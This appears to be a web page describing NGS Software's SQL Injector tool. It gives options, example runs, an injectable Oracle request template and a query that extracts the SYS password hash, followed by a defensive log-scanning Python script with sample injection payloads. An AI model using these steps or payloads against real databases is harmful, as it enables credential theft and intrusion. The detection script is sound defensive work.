The Web Local
SQL Injector

I became aware of this tool after attending the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software. It is broadly comparable to other data-mining tools that exploit SQL injection vulnerabilities in a web application to extract stored data from whichever database server sits behind it. It currently supports the following databases:

  • access
  • db2
  • informix
  • mssql
  • mysql
  • oracle
  • sybase

At the time of writing, this tool has not been publicly released and is only available to those who attend specific NGS Software training courses.

Execution:

C:\>sqlinjector [options]

[Options]
-t    TARGET is the target web server.
-a    ACTION is the action to take:
          -a database -> work out the database server software
          -a where    -> drill for data by injecting into the where clause
-f    FILE is the name of the file that contains the web request.
-p    PORT is the TCP port the web server is listening on.
-k    KNOWN is a value that is known to return data.
-gc   GOOD_CODE is the web server response code when everything is OK - usually 200.
-gt   GOOD_TEXT is text you'd expect to see in a good response.
-ec   ERROR_CODE is the web server response code when an error occurs - usually 500.
-et   ERROR_TEXT is the text you'd expect to see in an error response.
-h    help
-qf   QUERY_FILE is the file that contains the single row, single column query -
      e.g. select @@version
      Note: if no query_file is specified the default query is used, which extracts the software version for the given server.
-s    SERVER can be one of: mssql, oracle, informix, mysql, sysbase, db2, access.
-to   TIME_OUT is the TCP timeout (milliseconds) on the connection.
-d    details

Basic example (the known value is quoted because it contains a space):

sqlinjector -t 192.168.0.1 -a database -f query.txt -p 80 -gc 200 -ec 500 -k "NGS SOFTWARE" -gt SQUIRREL


Expected Output:
C:\sqlinjector.exe -t 192.168.0.17 -a database -f plsql.txt -p 7777 -gc 200 -ec 404

Probing for database server software...

Doing Microsoft SQL Server test...socket error on receive.
Completed but failed!

Doing Oracle test...Completed and PASSED!

Doing IBM Informix test...socket error on receive.
Completed but failed!

Doing MySQL test...socket error on receive.
Completed but failed!

Doing Microsoft Access test...socket error on receive.
Completed but failed!

Success.
This run fingerprints the back end as Oracle: only the Oracle test produced the expected "good" response, while the probes for the other database types ended in socket errors. With the server type known (-s oracle), a query file can be supplied with -qf to drill for specific data through the where clause:

C:\sqlinjector.exe -t 192.168.0.17 -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

Doing query on where clause

BB3F4EAC7D09DBBC BB3F4EAC7D09DBBC
Note:

plsql.txt contains the web request template (#!# marks where the tool injects its value):

GET /pls/orasso/web.get_object_owner?p_object=#!# HTTP/1.1
Host: 127.0.0.1

q.txt contains the single row, single column query whose result is shown above:

select password from dba_users where username= 'SYS'
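
As an added, defender-side example (not part of the original page or of the NGS tool), the following Python script flags the footprint such a tool leaves in a web server access log: many requests from one client to one path whose parameters carry quote characters or SQL keywords, answered by a mix of the "good" and "error" status codes the tool keys on. The log lines, client addresses, timestamps and payloads are constructed for the example; only the endpoint path is taken from the plsql.txt template above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs
# Constructed sample access-log lines (hypothetical clients, timestamps and
# payloads); the endpoint path mirrors the plsql.txt request template above.
SAMPLE_LOG = """\
192.168.0.5 - - [10/Oct/2003:13:55:36 +0100] "GET /pls/orasso/web.get_object_owner?p_object=WWSEC_USER HTTP/1.1" 200 512
192.168.0.9 - - [10/Oct/2003:13:55:40 +0100] "GET /pls/orasso/web.get_object_owner?p_object=NGS%20SOFTWARE%27%20and%20%271%27%3D%271 HTTP/1.1" 200 512
192.168.0.9 - - [10/Oct/2003:13:55:41 +0100] "GET /pls/orasso/web.get_object_owner?p_object=NGS%20SOFTWARE%27%20and%20%271%27%3D%272 HTTP/1.1" 404 210
192.168.0.9 - - [10/Oct/2003:13:55:42 +0100] "GET /pls/orasso/web.get_object_owner?p_object=NGS%20SOFTWARE%27%20and%20(select%20count(*)%20from%20dual)%3D1-- HTTP/1.1" 200 512
192.168.0.9 - - [10/Oct/2003:13:55:43 +0100] "GET /pls/orasso/web.get_object_owner?p_object=NGS%20SOFTWARE%27%20and%20(select%20count(*)%20from%20dual)%3D2-- HTTP/1.1" 404 210
192.168.0.9 - - [10/Oct/2003:13:55:50 +0100] "GET /pls/orasso/web.get_object_owner?p_object=WWSEC_USER HTTP/1.1" 200 512
"""

# Common Log Format: client ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) \S+$')
# Crude injection indicators in a percent-decoded parameter value.
SQLI_RE = re.compile(r"'|--|/\*|\b(select|union|from|where)\b", re.IGNORECASE)

def parse_line(line):
    """Return (client, path, params, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    return client, url.path, parse_qs(url.query, keep_blank_values=True), int(status)

def is_sqli_probe(params):
    """True if any parameter value carries a quote, comment marker or SQL keyword."""
    return any(SQLI_RE.search(v) for values in params.values() for v in values)

def find_blind_probes(lines, min_requests=3, good_codes=(200,), error_codes=(404, 500)):
    """Group suspicious requests by (client, path); keep groups showing the good/error
    oracle pattern a blind injector relies on: enough probes, with both kinds of answer."""
    stats = defaultdict(lambda: {"probes": 0, "good": 0, "error": 0})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or not is_sqli_probe(parsed[2]):
            continue
        client, path, _params, status = parsed
        entry = stats[(client, path)]
        entry["probes"] += 1
        if status in good_codes:
            entry["good"] += 1
        elif status in error_codes:
            entry["error"] += 1
    return {key: v for key, v in stats.items()
            if v["probes"] >= min_requests and v["good"] and v["error"]}
```

Tune good_codes/error_codes to what the monitored application actually returns (the run above used 200 and 404), and raise min_requests on busy endpoints to cut noise.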